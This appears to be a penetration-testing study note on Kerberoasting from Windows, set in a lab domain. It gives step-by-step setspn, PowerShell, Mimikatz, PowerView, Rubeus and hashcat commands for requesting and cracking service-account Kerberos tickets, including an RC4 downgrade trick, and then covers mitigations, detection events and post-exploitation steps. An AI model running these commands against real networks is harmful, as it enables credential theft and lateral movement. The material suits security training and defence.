Kerberoasting - from Windows
Kerberoasting targets Service Principal Name (SPN) accounts by requesting Kerberos TGS tickets encrypted with the service account’s password hash, then cracking them offline. From Windows, this can be done semi-manually with built-in tools or automated with offensive tooling like PowerView and Rubeus.
Semi-Manual Method
1. Enumerate SPNs with setspn.exe
setspn.exe -Q */*
Focus on user accounts (service accounts under OUs like Service Accounts), not computer accounts. Look for accounts like BACKUPAGENT, sqlprod, sqldev, solarwindsmonitor, etc.
2. Request a TGS Ticket via PowerShell
Target a single SPN and load the ticket into memory:
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"
What this does:
Add-Type -AssemblyName System.IdentityModel— loads the .NET namespace containing security token classesKerberosRequestorSecurityToken— creates a security token and requests a TGS ticket for the given SPN in the current logon session
To request tickets for all SPNs (includes computer accounts, not ideal):
setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
3. Extract Tickets with Mimikatz
mimikatz # base64 /out:true
mimikatz # kerberos::list /export
Omit base64 /out:true to write .kirbi files directly to disk instead.
4. Prepare and Crack the Hash
# Remove newlines from base64 blob
echo "<base64 blob>" | tr -d \\n
# Decode to .kirbi
cat encoded_file | base64 -d > sqldev.kirbi
# Extract hash with kirbi2john
python2.7 kirbi2john.py sqldev.kirbi
# Reformat for Hashcat (add etype 23 marker)
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat
# Crack with Hashcat (mode 13100 = RC4 TGS-REP)
hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt
Automated / Tool-Based Methods
PowerView
Import-Module .\PowerView.ps1
# Enumerate all SPN accounts
Get-DomainUser * -spn | select samaccountname
# Get TGS hash for a specific user in Hashcat format
Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat
# Export all SPN ticket hashes to CSV for offline cracking
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformation
Rubeus
# Gather stats on Kerberoastable accounts (no tickets requested)
.\Rubeus.exe kerberoast /stats
# Kerberoast high-value targets (admincount=1), no line wrapping
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
# Kerberoast a specific user
.\Rubeus.exe kerberoast /user:testspn /nowrap
# Force RC4 encryption even on AES-enabled accounts (pre-Server 2019 DCs only)
.\Rubeus.exe kerberoast /tgtdeleg /nowrap
# OPSEC-safe: use tgtdeleg and filter out AES-only accounts
.\Rubeus.exe kerberoast /rc4opsec /nowrap
# Output hashes to a file
.\Rubeus.exe kerberoast /outfile:hashes.txt /nowrap
# Kerberoast with alternate credentials
.\Rubeus.exe kerberoast /creduser:DOMAIN.FQDN\USER /credpassword:PASSWORD /nowrap
# Filter by password age
.\Rubeus.exe kerberoast /pwdsetafter:01-31-2005 /pwdsetbefore:03-29-2010 /resultlimit:5 /nowrap
Always use /nowrap to get hashes on a single line for easy copy-paste into Hashcat.
Encryption Types & Cracking
| Encryption | Hash Prefix | Hashcat Mode | Relative Speed |
|---|---|---|---|
| RC4_HMAC (type 23) | $krb5tgs$23$* | 13100 | Fast (seconds on CPU) |
| AES-128 (type 17) | $krb5tgs$17$* | 19600 | Slow |
| AES-256 (type 18) | $krb5tgs$18$* | 19700 | Very slow (~70x slower than RC4) |
Checking Encryption Support
Get-DomainUser testspn -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes
| msDS-SupportedEncryptionTypes | Meaning |
|---|---|
| 0 | Not defined — defaults to RC4_HMAC_MD5 |
| 24 | AES 128/256 only |
Downgrade to RC4 with /tgtdeleg
The /tgtdeleg flag in Rubeus specifies RC4 as the only supported algorithm in the TGS request body. This forces the DC to return an RC4 ticket even for AES-enabled accounts.
Caveat: This does not work against Windows Server 2019 DCs. Server 2019 always returns a ticket encrypted with the highest level supported by the target account. On Server 2016 and earlier DCs, the downgrade works.
Mitigation & Detection
Mitigations
| Control | Details |
|---|---|
| Managed Service Accounts (MSA/gMSA) | Auto-rotate complex passwords like machine accounts — preferred for all service accounts |
| LAPS | Alternative for accounts that can’t use gMSA |
| Long complex passwords | For non-managed service accounts, use passphrases that don’t appear in wordlists |
| Restrict RC4 | Remove RC4 support where possible (test thoroughly — may break legacy systems) |
| No privileged SPN accounts | Domain Admins and high-privilege accounts should never be used as SPN accounts |
Detection
| Indicator | Details |
|---|---|
| Event ID 4769 | “A Kerberos service ticket was requested” — bulk requests from one account in a short window indicate Kerberoasting |
| Event ID 4770 | “A Kerberos service ticket was renewed” |
| Encryption type 0x17 | RC4 ticket request — suspicious when AES is the norm |
| Abnormal TGS-REQ volume | 10-20 TGS requests per account is normal; hundreds in rapid succession is not |
Enable logging via: Group Policy > Computer Configuration > Policies > Windows Settings > Security Settings > Advanced Audit Policy > Audit Kerberos Service Ticket Operations
Post-Exploitation with Cracked Credentials
Once service account passwords are cracked, potential next steps:
- RDP or WinRM access as a local user/admin
- Remote admin via PsExec
- Access sensitive file shares
- MSSQL access as a DBA for privilege escalation
- Further domain enumeration for lateral movement